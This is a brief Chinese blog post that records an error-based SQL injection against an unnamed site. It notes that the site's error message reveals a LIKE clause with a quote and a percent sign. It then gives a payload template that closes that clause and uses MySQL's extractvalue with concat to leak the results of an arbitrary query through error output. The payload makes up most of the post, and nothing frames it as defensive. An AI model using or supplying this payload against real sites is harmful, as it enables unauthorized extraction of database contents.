某SQL注入--报错注入payload

1、证明存在sql注入,根据这个报错语句,,有'  有%

 

 

 

 

 2、payload  闭合语句

%' or (select extractvalue("anything",concat('~',( sql语句)))) or title like '% 1

 

posted @ 2021-03-09 09:29  尛①麵  阅读(324)  评论(0)    收藏  举报